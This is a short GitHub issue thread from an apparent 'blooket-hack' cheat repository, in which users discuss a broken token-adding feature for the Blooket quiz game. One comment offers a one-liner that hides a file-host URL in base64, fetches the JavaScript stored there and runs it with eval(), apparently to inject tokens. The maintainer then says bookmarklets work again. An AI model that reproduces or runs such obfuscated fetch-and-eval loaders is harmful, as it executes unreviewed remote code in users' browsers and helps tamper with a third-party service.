### ISSUE TITLE
not getting tokens

### ISSUE THREAD

**Issue by ghostly69696969** [glixzzy/blooket-hack#432]
add token isn't working

**Comment by herbsxx** [comment]
i think the new code is fetch(atob('aHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vc2Nob29sLWNoZWF0cy9yYXcvdXBsb2FkL3YxNjM3NDUyMjEzL2dsb2JhbEFkZFRva2Vucy5qcw==')).then((res) => res.text().then((t) => eval(t)))

**Comment by glixzzy** [comment]
brought back bookmarklets like before so everything should work fine now
